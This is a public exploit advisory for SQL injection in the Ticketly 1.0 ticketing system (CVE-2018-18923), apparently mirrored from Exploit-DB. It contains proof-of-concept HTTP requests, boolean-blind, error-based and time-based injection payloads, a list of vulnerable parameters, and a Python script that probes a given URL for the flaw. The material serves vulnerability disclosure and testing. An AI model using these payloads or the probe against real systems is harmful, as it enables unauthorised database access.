exploit-db-mirror/exploits/php/webapps/45902.txt

# Exploit Title: Ticketly 1.0 Multiple SQL Injection
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-11-19
# Google Dork: N/A
# Vendor: Abisoft (https://abisoftgt.net)
# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql
# Affected Version: 1.0
# Patched Version: unpatched
# Category: Web Application
# Platform: Windows & Ubuntu
# Tested on: Win10x64 & Kali Linux
# CVE: CVE-2018-18923
# 1. Technical Description:
# Ticketly 1.0 is affected by SQL injection in multiple parameters of several
# resources reached through POST requests. This allows an attacker to read and
# modify sensitive information in the database used by the application.
# 2. Proof Of Concept (PoC):
# 2.1 The following POST request makes the application return an HTTP 500. The single
# double quote (%22) appended to the name parameter breaks out of the quoted SQL string,
# so the statement no longer parses.
---
POST /ticketly/action/addproject.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/ticketly/projects.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 29
Connection: close
name=Test%22&description=Test
---
# 2.2 In a second request, send two double quotes (%22%22) instead and the application answers 200 OK:
# MySQL treats a doubled quote inside a double-quoted literal as an escaped quote, so the statement
# parses again. The 500/200 difference shows the parameter reaches the query unsanitized.
---
POST /ticketly/action/addproject.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/ticketly/projects.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 32
Connection: close
name=Test%22%22&description=Test
---
# 3. Payloads
# 3.1 Payload (boolean-based blind)
name=Test" RLIKE (SELECT (CASE WHEN (4632=4632) THEN 0x54657374 ELSE 0x28 END)) AND "lrmZ"="lrmZ&description=Test
# 3.2 Payload (error-based)
name=Test" AND EXTRACTVALUE(9139,CONCAT(0x5c,0x7176766a71,(SELECT (ELT(9139=9139,1))),0x7178717a71)) AND "SZJL"="SZJL&description=Test
# 3.3 Payload (AND/OR time-based blind)
name=Test" RLIKE SLEEP(5) AND "WkTS"="WkTS&description=Test
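The manual checks in sections 2 and 3.3 can be automated. The Python script below is an added example, not part of the original advisory or of Ticketly: it sends the baseline, single-quote and doubled-quote bodies to addproject.php and classifies the 200/500/200 pattern, then confirms with the SLEEP(5) payload by comparing response times against a baseline request. The endpoint path, headers and payloads are taken from the advisory; `fake_ticketly` and `fake_patched` are constructed stand-ins that reproduce the reported behaviour so the script runs offline, and a real target URL (your own test instance) is passed on the command line.

```python
"""Quote-differential and time-based SQLi probe for Ticketly's addproject.php.

Added example (not the advisory's or the vendor's code). It automates the
manual checks from sections 2 and 3.3 of the advisory and can run offline
against a constructed stand-in for the vulnerable endpoint.
"""
import re
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Tuple

# Values taken from the advisory: a lone `"` breaks the quoted SQL string,
# `""` is an escaped quote inside a MySQL double-quoted literal, and SLEEP(5)
# is the time-based confirmation payload from section 3.3.
BASELINE = 'Test'
ONE_QUOTE = 'Test"'
TWO_QUOTES = 'Test""'
SLEEP_SECS = 5
TIME_BASED = 'Test" RLIKE SLEEP(%d) AND "WkTS"="WkTS' % SLEEP_SECS

# A transport takes an encoded POST body and returns (http_status, seconds).
Transport = Callable[[str], Tuple[int, float]]


def build_body(name: str, description: str = "Test") -> str:
    """Encode the body the way the advisory's requests do (name, description)."""
    return urllib.parse.urlencode({"name": name, "description": description})


def http_transport(url: str) -> Transport:
    """Real transport for a test instance you control, e.g.
    http://localhost/ticketly/action/addproject.php (path from the advisory)."""
    def send(body: str) -> Tuple[int, float]:
        req = urllib.request.Request(
            url, data=body.encode(), method="POST",
            headers={"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                     "X-Requested-With": "XMLHttpRequest"})
        start = time.monotonic()
        try:
            with urllib.request.urlopen(req, timeout=SLEEP_SECS * 3) as resp:
                status = resp.status
        except urllib.error.HTTPError as err:  # urllib raises on 4xx/5xx
            status = err.code
        return status, time.monotonic() - start
    return send


def quote_differential(send: Transport) -> Dict[str, object]:
    """Section 2: clean request 200, one quote -> 500, two quotes -> 200 again."""
    base, _ = send(build_body(BASELINE))
    one, _ = send(build_body(ONE_QUOTE))
    two, _ = send(build_body(TWO_QUOTES))
    # Only the 200 / 5xx / 200 pattern counts; a 500 on every request would
    # just be a broken endpoint, not evidence that the quote reached SQL.
    likely = base == 200 and one >= 500 and two == 200
    return {"baseline": base, "one_quote": one, "two_quotes": two,
            "likely_injectable": likely}


def time_based_confirm(send: Transport, threshold: float = SLEEP_SECS * 0.8) -> bool:
    """Section 3.3: the SLEEP(5) payload must be slower than a baseline request
    by most of the requested delay. Subtracting the baseline keeps a slow
    server from producing a false positive."""
    _, base_t = send(build_body(BASELINE))
    _, sleep_t = send(build_body(TIME_BASED))
    return (sleep_t - base_t) >= threshold


def _name_param(body: str) -> str:
    return urllib.parse.parse_qs(body).get("name", [""])[0]


def fake_ticketly(body: str) -> Tuple[int, float]:
    """Constructed stand-in for the vulnerable endpoint (not real Ticketly
    code): an unbalanced `"` in name breaks the query (500); SLEEP(n) is
    reported as n seconds of elapsed time without actually sleeping."""
    name = _name_param(body)
    if name.count('"') % 2 == 1:
        return 500, 0.01
    match = re.search(r"SLEEP\((\d+)\)", name)
    return 200, 0.01 + (float(match.group(1)) if match else 0.0)


def fake_patched(body: str) -> Tuple[int, float]:
    """Constructed stand-in for a fixed endpoint using prepared statements:
    the input is bound as data, so quotes and SLEEP() never reach the parser."""
    return 200, 0.01


if __name__ == "__main__":
    # No argument: exercise the offline stand-in. Argument: probe that URL.
    send = http_transport(sys.argv[1]) if len(sys.argv) > 1 else fake_ticketly
    print("quote differential:", quote_differential(send))
    print("time-based confirmed:", time_based_confirm(send))
```

Run it with no arguments to exercise the constructed stand-in, or with the URL of a test instance you control to probe a real deployment. The time-based check subtracts a baseline round trip before comparing against the threshold, so ordinary server latency is not mistaken for a SLEEP() delay; the patched stand-in shows what a negative result looks like for both checks.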
# 4. Vulnerable resources and parameters
# /action/addproject.php (name, description and category_id)
# /action/addticket.php (king_id, priority_id, project_id, status_id and title)
# /reports.php (kind_id and status_id)
# 5. Timeline
# 24/07/2018 Discovery
# 24/07/2018 Developer contacted
# 24/07/2018 Fix for the vulnerability pending
# 02/11/2018 CVE ID requested
# 04/11/2018 CVE-2018-18923 assigned
# 05/11/2018 Public disclosure
# 6. References:
# https://hackpuntes.com/cve-2018-18923-ticketly-1-0-multiples-sql-injections/